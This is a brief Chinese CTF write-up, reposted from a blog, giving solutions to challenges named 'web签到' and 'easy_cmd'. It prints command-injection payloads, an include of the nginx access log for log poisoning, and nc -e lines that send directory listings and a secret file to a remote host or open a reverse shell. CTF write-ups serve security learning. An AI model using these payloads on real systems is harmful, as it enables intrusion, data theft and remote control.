文章目录
web签到
有长度限制
payload
ls />a
nl /*>a
然后访问a即可得到flag
easy_cmd
payload
num1=1;include "/var/log/nginx/access.log";&symbol=-&num2=3
然后就是日志包含那一套
easy_cmd
通过nc -e向自己的vps传递命令
nc x.x.x.x port -e ls /
nc x.x.x.x port -e cat /secert
也可以直接反弹个shell
nc x.x.x.x port -e /bin/sh
easy_sql
还在看
🌚
本文转载自: https://blog.csdn.net/miuzzx/article/details/126185560
版权归原作者 yu22x 所有, 如有侵权,请联系我们删除。
版权归原作者 yu22x 所有, 如有侵权,请联系我们删除。